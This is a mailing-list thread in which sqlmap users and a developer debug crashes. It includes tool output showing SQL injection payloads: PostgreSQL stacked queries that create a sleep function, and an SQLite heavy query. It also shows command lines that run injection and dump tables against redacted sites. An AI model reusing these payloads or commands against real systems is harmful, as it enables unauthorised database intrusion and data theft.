Thread: [sqlmap-users] New Error
Brought to you by:
inquisb
From: <nig...@em...> - 2010-12-17 06:34:50
|
sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b [03:44:42] [INFO] testing connection to the target url [03:44:52] [INFO] testing NULL connection to the target url [03:44:57] [INFO] testing if the url is stable, wait a few seconds [03:45:00] [INFO] url is stable all the tests.... Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y sqlmap identified the following injection points with 10051 HTTP(s) requests: --- Place: GET Parameter: xxx Type: stacked queries Title: PostgreSQL < 8.2 stacked queries (Glibc) Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 Place: Cookie Parameter: app_state Type: stacked queries Title: SQLite > 2.0 stacked queries (heavy query) Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: xxx, type: Unescaped numeric (default) [1] place: Cookie, parameter: app_state, type: LIKE single quoted string [q] Quit > 0 [07:24:11] [INFO] testing PostgreSQL [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL [07:24:12] [INFO] testing MySQL [07:24:12] [WARNING] the back-end DBMS is not MySQL [07:24:12] [INFO] testing Oracle [07:24:12] [WARNING] the back-end DBMS is not Oracle [07:24:12] [INFO] testing Microsoft SQL Server [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server [07:24:13] [INFO] the back-end DBMS is SQLite [07:24:13] [INFO] fetching banner [07:24:13] [INFO] retrieving the length of query output [07:24:13] [INFO] retrieved: [07:24:16] [INFO] retrieved: [07:24:19] [INFO] testing SQLite [07:24:20] [WARNING] the back-end DBMS is not SQLite [07:24:20] [INFO] testing Microsoft Access [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access [07:24:21] [INFO] testing Firebird [07:24:21] [WARNING] the back-end DBMS is not Firebird [07:24:21] [INFO] testing SAP MaxDB [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB [07:24:22] [INFO] testing Sybase [07:24:22] [WARNING] the back-end DBMS is not Sybase [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start action() File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) AttributeError: 'NoneType' object has no attribute 'getFingerprint' [*] shutting down at: 07:24:22 |
From: <nig...@em...> - 2011-01-05 09:19:12
|
<body bgcolor="#ffffff" background="https://img.web.de/v/p.gif" class="bgRepeatYes" style="background-repeat: repeat; background-color: rgb(255, 255, 255); color: rgb(0, 0, 0); font-family: verdana,geneva; font-size: 9pt; padding-left: 0px;"><div style="min-height: 200px; background-image: url(https://img.web.de/v/p.gif); background-repeat: repeat; background-color: #ffffff; font-family: verdana,geneva; font-size: 9pt; padding-left: 0px;"><span style="font-size: 9pt;"><span style="font-family: verdana,geneva;"><span style="background-color: transparent;"><span style="color: #000000;"><span style="color: #000000;">Hi,<br /><br />the Injection works great for Hours and then this. The only thing i have changed is the start parameter. </span></span></span></span></span><br /><br />sqlmap -u "http://xxxxxxx-xxx/show_thumb_main2.php?id=282334&type=gallery" -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --threads=3 --auth-type=basic --auth-cred=xxxx:xxxxx -p id --suffix=282334 --level 5 --risk 3 --dump -D xxxx -T xxxxxx --start=47951<br /><br /> File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in http_error_auth_reqed<br /> self, auth_header, host, req, headers)<br /> File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed<br /> return self.retry_http_basic_auth(host, req, realm)<br /> File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth<br /> return self.parent.open(req, timeout=req.timeout)<br /> File "C:\Python26\lib\urllib2.py", line 397, in open<br /> response = meth(req, response)<br /> File "C:\Python26\lib\urllib2.py", line 510, in http_response<br /> 'http', request, response, code, msg, hdrs)<br /> File "C:\Python26\lib\urllib2.py", line 429, in error<br /> result = self._call_chain(*args)<br /> File "C:\Python26\lib\urllib2.py", line 369, in _call_chain<br /> result = func(*args)<br /> File "C:\Python26\lib\urllib2.py", line 855, in http_error_401<br /> url, req, headers)<br /> File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in http_error_auth_reqed<br /> self, auth_header, host, req, headers)<br /> File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed<br /> return self.retry_http_basic_auth(host, req, realm)<br /> File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth<br /> return self.parent.open(req, timeout=req.timeout)<br /> File "C:\Python26\lib\urllib2.py", line 391, in open<br /> response = self._open(req, data)<br /> File "C:\Python26\lib\urllib2.py", line 409, in _open<br /> '_open', req)<br /> File "C:\Python26\lib\urllib2.py", line 369, in _call_chain<br /> result = func(*args)<br /> File "C:\Python26\lib\urllib2.py", line 1161, in http_open<br /> return self.do_open(httplib.HTTPConnection, req)<br /> File "C:\Python26\lib\urllib2.py", line 1107, in do_open<br /> h = http_class(host, timeout=req.timeout) # will parse host:port<br />RuntimeError: maximum recursion depth exceeded<br /><br />[*] shutting down at: 10:12:52</div></body> |
From: Miroslav S. <mir...@gm...> - 2011-01-05 11:31:26
|
hi. this is a complex Python bug. i've recently found a patch for this kind of behavior, but it seems that the patch only solves the problem with single threaded mode (for those who knows python, line 29 in basicauthhandler.py with "if req is not self.retried_req" is problematic for multi threaded mode). kr On Wed, Jan 5, 2011 at 10:19 AM, <nig...@em...> wrote: > Hi, > > the Injection works great for Hours and then this. The only thing i have > changed is the start parameter. > > sqlmap -u "http://xxxxxxx-xxx/show_thumb_main2.php?id=282334&type=gallery" > -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --threads=3 --auth-type=basic > --auth-cred=xxxx:xxxxx -p id --suffix=282334 --level 5 --risk 3 --dump -D > xxxx -T xxxxxx --start=47951 > > File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in > http_error_auth_reqed > self, auth_header, host, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 397, in open > response = meth(req, response) > File "C:\Python26\lib\urllib2.py", line 510, in http_response > 'http', request, response, code, msg, hdrs) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in > http_error_auth_reqed > self, auth_header, host, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 1161, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "C:\Python26\lib\urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > RuntimeError: maximum recursion depth exceeded > > [*] shutting down at: 10:12:52 > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2011-01-05 11:37:44
|
ok. committed the patch. now it should work in multi-threaded mode too. kr p.s. it's quite strange that you get 401 in the middle of table dumping, especially that part with --start=47951. have some theories, but they are only conspiracy related. On Wed, Jan 5, 2011 at 10:19 AM, <nig...@em...> wrote: > Hi, > > the Injection works great for Hours and then this. The only thing i have > changed is the start parameter. > > sqlmap -u "http://xxxxxxx-xxx/show_thumb_main2.php?id=282334&type=gallery" > -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --threads=3 --auth-type=basic > --auth-cred=xxxx:xxxxx -p id --suffix=282334 --level 5 --risk 3 --dump -D > xxxx -T xxxxxx --start=47951 > > File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in > http_error_auth_reqed > self, auth_header, host, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 397, in open > response = meth(req, response) > File "C:\Python26\lib\urllib2.py", line 510, in http_response > 'http', request, response, code, msg, hdrs) > File "C:\Python26\lib\urllib2.py", line 429, in error > result = self._call_chain(*args) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 855, in http_error_401 > url, req, headers) > File "C:\pentest\sqlmap.0.9\lib\request\basicauthhandler.py", line 33, in > http_error_auth_reqed > self, auth_header, host, req, headers) > File "C:\Python26\lib\urllib2.py", line 833, in http_error_auth_reqed > return self.retry_http_basic_auth(host, req, realm) > File "C:\Python26\lib\urllib2.py", line 843, in retry_http_basic_auth > return self.parent.open(req, timeout=req.timeout) > File "C:\Python26\lib\urllib2.py", line 391, in open > response = self._open(req, data) > File "C:\Python26\lib\urllib2.py", line 409, in _open > '_open', req) > File "C:\Python26\lib\urllib2.py", line 369, in _call_chain > result = func(*args) > File "C:\Python26\lib\urllib2.py", line 1161, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "C:\Python26\lib\urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > RuntimeError: maximum recursion depth exceeded > > [*] shutting down at: 10:12:52 > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2010-12-17 07:48:39
|
thx a lot nightman. find it fixed in the latest revision from SVN repository. kr On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: > sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b > [03:44:42] [INFO] testing connection to the target url > [03:44:52] [INFO] testing NULL connection to the target url > [03:44:57] [INFO] testing if the url is stable, wait a few seconds > [03:45:00] [INFO] url is stable > all the tests.... > > Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y > sqlmap identified the following injection points with 10051 HTTP(s) requests: > --- > Place: GET > Parameter: xxx > Type: stacked queries > Title: PostgreSQL < 8.2 stacked queries (Glibc) > Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| > |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 > 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 > > Place: Cookie > Parameter: app_state > Type: stacked queries > Title: SQLite > 2.0 stacked queries (heavy query) > Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 > 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 > --- > > there were multiple injection points, please select the one to use for following injections: > [0] place: GET, parameter: xxx, type: Unescaped numeric (default) > [1] place: Cookie, parameter: app_state, type: LIKE single quoted string > [q] Quit >> 0 > [07:24:11] [INFO] testing PostgreSQL > [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL > [07:24:12] [INFO] testing MySQL > [07:24:12] [WARNING] the back-end DBMS is not MySQL > [07:24:12] [INFO] testing Oracle > [07:24:12] [WARNING] the back-end DBMS is not Oracle > [07:24:12] [INFO] testing Microsoft SQL Server > [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server > [07:24:13] [INFO] the back-end DBMS is SQLite > [07:24:13] [INFO] fetching banner > [07:24:13] [INFO] retrieving the length of query output > [07:24:13] [INFO] retrieved: > [07:24:16] [INFO] retrieved: > [07:24:19] [INFO] testing SQLite > [07:24:20] [WARNING] the back-end DBMS is not SQLite > [07:24:20] [INFO] testing Microsoft Access > [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access > [07:24:21] [INFO] testing Firebird > [07:24:21] [WARNING] the back-end DBMS is not Firebird > [07:24:21] [INFO] testing SAP MaxDB > [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB > [07:24:22] [INFO] testing Sybase > [07:24:22] [WARNING] the back-end DBMS is not Sybase > > [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start > action() > File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action > dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) > AttributeError: 'NoneType' object has no attribute 'getFingerprint' > > [*] shutting down at: 07:24:22 > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2010-12-20 22:39:35
|
hi. it seems that it wasn't previously properly fixed (by me). now it shouldn't be a problem any more. kr On Fri, Dec 17, 2010 at 8:48 AM, Miroslav Stampar <mir...@gm...> wrote: > thx a lot nightman. > > find it fixed in the latest revision from SVN repository. > > kr > > On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: >> sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b >> [03:44:42] [INFO] testing connection to the target url >> [03:44:52] [INFO] testing NULL connection to the target url >> [03:44:57] [INFO] testing if the url is stable, wait a few seconds >> [03:45:00] [INFO] url is stable >> all the tests.... >> >> Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y >> sqlmap identified the following injection points with 10051 HTTP(s) requests: >> --- >> Place: GET >> Parameter: xxx >> Type: stacked queries >> Title: PostgreSQL < 8.2 stacked queries (Glibc) >> Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| >> |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 >> 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 >> >> Place: Cookie >> Parameter: app_state >> Type: stacked queries >> Title: SQLite > 2.0 stacked queries (heavy query) >> Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 >> 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 >> --- >> >> there were multiple injection points, please select the one to use for following injections: >> [0] place: GET, parameter: xxx, type: Unescaped numeric (default) >> [1] place: Cookie, parameter: app_state, type: LIKE single quoted string >> [q] Quit >>> 0 >> [07:24:11] [INFO] testing PostgreSQL >> [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL >> [07:24:12] [INFO] testing MySQL >> [07:24:12] [WARNING] the back-end DBMS is not MySQL >> [07:24:12] [INFO] testing Oracle >> [07:24:12] [WARNING] the back-end DBMS is not Oracle >> [07:24:12] [INFO] testing Microsoft SQL Server >> [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server >> [07:24:13] [INFO] the back-end DBMS is SQLite >> [07:24:13] [INFO] fetching banner >> [07:24:13] [INFO] retrieving the length of query output >> [07:24:13] [INFO] retrieved: >> [07:24:16] [INFO] retrieved: >> [07:24:19] [INFO] testing SQLite >> [07:24:20] [WARNING] the back-end DBMS is not SQLite >> [07:24:20] [INFO] testing Microsoft Access >> [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access >> [07:24:21] [INFO] testing Firebird >> [07:24:21] [WARNING] the back-end DBMS is not Firebird >> [07:24:21] [INFO] testing SAP MaxDB >> [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB >> [07:24:22] [INFO] testing Sybase >> [07:24:22] [WARNING] the back-end DBMS is not Sybase >> >> [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio >> n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi >> ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get >> back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: nt >> Traceback (most recent call last): >> File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main >> start() >> File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start >> action() >> File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action >> dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) >> AttributeError: 'NoneType' object has no attribute 'getFingerprint' >> >> [*] shutting down at: 07:24:22 >> >> ------------------------------------------------------------------------------ >> Lotusphere 2011 >> Register now for Lotusphere 2011 and learn how >> to connect the dots, take your collaborative environment >> to the next level, and enter the era of Social Business. >> http://p.sf.net/sfu/lotusphere-d2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |